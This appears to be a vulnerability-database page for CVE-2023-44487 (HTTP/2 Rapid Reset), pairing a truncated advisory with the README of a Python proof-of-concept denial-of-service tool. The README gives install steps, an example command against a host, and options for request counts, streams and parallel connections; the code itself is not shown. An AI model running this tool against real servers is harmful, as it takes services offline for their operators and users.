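Related vulnerability
Title:
Apache HTTP/2 resource management error vulnerability
(CVE-2023-44487)
Description: HTTP/2 is the second version of the Hypertext Transfer Protocol, used mainly to ensure communication between clients and servers. Apache HTTP/2 contains a security vulnerability that attackers can exploit to cause a denial of service. The following products and versions are affected: .NET 6.0, ASP.NET Core 6.0, .NET 7.0, Microsoft Visual Studio 2022 version 17.2, Microsoft Visual Studio 2022 version 17.4, Microsoft Visual Studio 2022 version 17.6, Micros
Description
A Python-based exploit to test out the rapid reset attack (CVE-2023-44487)
Introduction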
# HTTP2 Rapid Reset Attack: CVE-2023-44487
A quick exploit to test out the rapid reset attack (CVE-2023-44487). Note: for educational purposes only.
## Table of Contents
- [Installation](#installation)
- [Usage](#usage)
## Installation
Clone the repository to your local machine using Git, install Poetry, and run the program:
```bash
git clone https://github.com/studiogangster/CVE-2023-44487.git
cd CVE-2023-44487
# Install Poetry, if you haven't already:
curl -sSL https://install.python-poetry.org | python -
# Install the project dependencies:
poetry install
# Activate the virtual environment created by Poetry:
poetry shell
# Show the help text:
python main.py --help
# Example:
python main.py --host example.com --path /api --headers "Authorization: Basic dummy-token ; Custom-Header:Custom-Header-Value" --port 443 --requests_count 100 --max_streams 20 --parallel_connections 2
```
## Usage
```bash
Usage: main.py [OPTIONS]

Options:
  --host TEXT                     Host URL  [required]
  --path TEXT                     Path on the host  [required]
  --headers TEXT                  Headers (comma-separated)  [required]
  --port INTEGER                  Port number  [required]
  --requests_count INTEGER        Number of requests to be sent  [required]
  --max_streams INTEGER           Maximum streams to be opened in parallel
                                  [required]
  --parallel_connections INTEGER  Number of parallel connections to be made
                                  with the server. (TCP connection)
                                  [required]
  --help                          Show this message and exit.
```
File snapshot
[4.0K] /data/pocs/41804f685791039b5c9ff5b34dd135bf42c365c5
├── [ 11K] LICENSE
├── [8.6K] main.py
├── [ 35K] poetry.lock
├── [ 393] pyproject.toml
└── [1.7K] README.md
0 directories, 5 files